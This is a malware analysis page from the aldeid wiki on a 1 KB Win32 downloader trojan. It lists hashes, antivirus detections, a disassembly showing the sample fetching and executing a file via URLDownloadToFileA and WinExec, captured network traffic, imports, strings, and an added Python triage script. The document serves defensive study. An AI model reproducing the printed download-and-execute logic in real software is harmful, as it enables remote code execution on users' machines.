818da150dbbc8fd3a34d445c1dbd8816

From aldeid

Description

Summary

INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Identification

MD5 818da150dbbc8fd3a34d445c1dbd8816
SHA1 3532e4bda622f4b7880366b9c70c0950513fdde6
SHA256 8cbc30b6fa05883d80a94183f7f0740fd1492c61f0cccbfe91ebb4c2e7b24274
ssdeep 12:e9GSGyzzrWtAz4ZbdSEMBmgfvZSbWKfLLz:e9GSFzr7KbrMBX3ZSW4P
imphash 8ad542ab16383a3043ad871c51ebd78e
File size 1.0 KB ( 1024 bytes )
File type Win32 EXE
Magic literal PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Antivirus detection

Antivirus Result Update
AVG Downloader.Multidl 20140225
Ad-Aware Generic.Malware.dld!!.EFB8232A 20140226
Agnitum Trojan.DL.MultiDL!oAVKSKI929o 20140225
AhnLab-V3 Trojan/Win32.Xema 20140225
AntiVir TR/Downloader.Gen 20140226
Antiy-AVL Trojan[Downloader]/Win32.MultiDL 20140226
Avast Win32:MiniMal [Trj] 20140226
Baidu-International Trojan.Win32.MultiDL.aZ 20140226
BitDefender Generic.Malware.dld!!.EFB8232A 20140226
Bkav W32.EloradoKK.Worm 20140225
CAT-QuickHeal TrojanDownloader.MultiDL.23 20140226
CMC Generic.Win32.818da150db!MD 20140220
Commtouch W32/Downloader-Sml!Eldorado 20140226
Comodo TrojWare.Win32.TrojanDownloader.MultiDL.23 20140226
DrWeb Trojan.Aphex 20140226
ESET-NOD32 Win32/TrojanDownloader.MultiDL.23 20140226
Emsisoft Generic.Malware.dld!!.EFB8232A (B) 20140226
F-Prot W32/Downloader-Sml!Eldorado 20140226
F-Secure Generic.Malware.dld!!.EFB8232A 20140226
Fortinet W32/Webdl.23!tr 20140226
GData Generic.Malware.dld!!.EFB8232A 20140226
Ikarus AdvHeur 20140226
Jiangmin TrojanDownloader.MultiDL.23 20140226
K7GW Trojan-Downloader ( 000077a11 ) 20140225
Kaspersky Trojan-Downloader.Win32.MultiDL.23 20140226
Kingsoft Win32.Troj.MultiDL.23.(kcloud) 20140226
McAfee Downloader-AE 20140226
McAfee-GW-Edition Downloader-AE 20140226
MicroWorld-eScan Generic.Malware.dld!!.EFB8232A 20140226
Microsoft TrojanDownloader:Win32/MultiDL.2_3 20140226
NANO-Antivirus Trojan.Win32.MultiDL.hkbi 20140226
Norman Downloader 20140224
Panda Trojan Horse 20140225
Qihoo-360 Win32/Trojan.2ff 20140226
Rising PE:Trojan.DL.Multidl.23!1073769335 20140226
Sophos Troj/DownLdr-AE 20140226
Symantec Downloader.Trojan 20140226
TheHacker Trojan/Downloader.MultiDL.23 20140226
TotalDefense Win32/DlQroj.23 20140225
TrendMicro TROJ_AE.AD 20140226
TrendMicro-HouseCall TROJ_AE.AD 20140226
VBA32 TrojanDownloader.MultiDL 20140225
VIPRE Trojan-Downloader.Win32.Small!cobra (v) 20140226
nProtect Trojan-Downloader/W32.MultiDL.1024 20140225
ByteHero 20140226
ClamAV 20140226
K7AntiVirus 20140225
Malwarebytes 20140226
SUPERAntiSpyware 20140226
ViRobot 20140226

Downloader capabilities

As shown in the following assembly extract, the malware downloads an executable from localhost (Http://127.0.0.1/webdl/yourserver.exe) with URLDownloadToFileA and saves it as c:\windl32.com, then executes that file with WinExec and terminates with ExitProcess.

.text:004010E3                 public start
.text:004010E3 start           proc near               ; CODE XREF: .text:004010AC↑j
.text:004010E3                 push    0               ; LPBINDSTATUSCALLBACK
.text:004010E5                 push    0               ; DWORD
.text:004010E7                 push    offset CmdLine  ; "c:\\windl32.com"
.text:004010EC                 push    offset aHttp127_0_0_1W ; "Http://127.0.0.1/webdl/yourserver.exe"
.text:004010F1                 push    0               ; LPUNKNOWN
.text:004010F3                 call    URLDownloadToFileA
.text:004010F8                 push    0               ; uCmdShow
.text:004010FA                 push    offset CmdLine  ; "c:\\windl32.com"
.text:004010FF                 call    WinExec
.text:00401104                 push    0               ; uExitCode
.text:00401106                 call    ExitProcess
.text:00401106 start           endp

Dynamic analysis

Network indicators

HTTP request

GET /webdl/yourserver.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 127.0.0.1
Connection: Keep-Alive
Cookie: s_pers=%20s_fid%3D3E7C4746FF9393D9-0B79608B28879893%7C1447098463237%3B%20s_vs%3D1%7C1384028263237%3B%20s_nr%3D1384026463237-New%7C1415562463237%3B
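As an added example (not part of the original write-up), the following Python triage reproduces the reasoning of the "Downloader capabilities" and "HTTP request" sections: it flags the URLDownloadToFileA + WinExec pairing in the imports, pulls the URL and drop path out of the extracted strings, and checks that the URL rebuilt from the captured GET request matches the one embedded in the binary. The imports, strings and request are constructed inline from the values on this page; the extra API names in the two sets are assumed, not taken from this sample.

```python
import re
from typing import Dict, List, Optional

# Constructed inputs, transcribed from the IAT, Strings and HTTP request sections
# of this page. The stray leading "5" on the URL string is kept exactly as the
# Strings section shows it, to exercise the URL regex against dirty input.
IMPORTS = {"KERNEL32.dll": ["ExitProcess", "WinExec"],
           "urlmon.dll": ["URLDownloadToFileA"]}
STRINGS = ["ExitProcess", "WinExec", "KERNEL32.dll", "URLDownloadToFileA",
           "urlmon.dll", "5Http://127.0.0.1/webdl/yourserver.exe", "c:\\windl32.com"]
HTTP_REQUEST = ("GET /webdl/yourserver.exe HTTP/1.1\r\n"
                "Accept: */*\r\n"
                "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
                "Host: 127.0.0.1\r\n"
                "Connection: Keep-Alive\r\n\r\n")

# Assumed API sets: the page only shows URLDownloadToFileA and WinExec.
DOWNLOAD_APIS = {"URLDownloadToFileA", "URLDownloadToFileW", "InternetOpenUrlA"}
EXEC_APIS = {"WinExec", "ShellExecuteA", "ShellExecuteW", "CreateProcessA", "CreateProcessW"}
# Case-insensitive scheme so "Http://" (as in this sample) is not missed; the
# match starts at the scheme, so bytes glued in front of it are dropped.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
PATH_RE = re.compile(r"^[a-zA-Z]:\\[^\s\"']+$")

def triage_downloader(imports: Dict[str, List[str]], strings: List[str]) -> dict:
    """Flag the download-and-execute pattern and collect its indicators."""
    flat = {api for apis in imports.values() for api in apis}
    urls = [m.group(0) for s in strings for m in URL_RE.finditer(s)]
    paths = [s for s in strings if PATH_RE.match(s)]
    dl, ex = sorted(flat & DOWNLOAD_APIS), sorted(flat & EXEC_APIS)
    return {"download_apis": dl, "exec_apis": ex, "urls": urls, "drop_paths": paths,
            "verdict": "download-and-execute" if dl and ex and urls else "inconclusive"}

def url_from_request(raw: str) -> Optional[str]:
    """Rebuild the requested URL from the request line plus the Host header."""
    lines = raw.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[1].startswith("/"):
        return None  # not a well-formed request line
    host = next((l.split(":", 1)[1].strip() for l in lines[1:]
                 if l.lower().startswith("host:")), None)
    return f"http://{host}{parts[1]}" if host else None

def static_dynamic_match(static_urls: List[str], request_url: str) -> bool:
    """Confirm the URL seen on the wire is one embedded in the binary."""
    return any(u.lower() == request_url.lower() for u in static_urls)

if __name__ == "__main__":
    report = triage_downloader(IMPORTS, STRINGS)
    wire = url_from_request(HTTP_REQUEST)
    print(report, wire, static_dynamic_match(report["urls"], wire))
```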

Files

INCOMPLETE SECTION: this section is being written and is therefore not complete.

Registry keys

INCOMPLETE SECTION: this section is being written and is therefore not complete.

Mutexes

INCOMPLETE SECTION: this section is being written and is therefore not complete.

Static analysis

Sections

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
.text      0x1000       0x11e        0x200        2.842716

IAT

KERNEL32.dll

  • ExitProcess
  • WinExec

urlmon.dll

  • URLDownloadToFileA

Strings

ExitProcess
WinExec
KERNEL32.dll
URLDownloadToFileA
urlmon.dll
5Http://127.0.0.1/webdl/yourserver.exe
c:\windl32.com
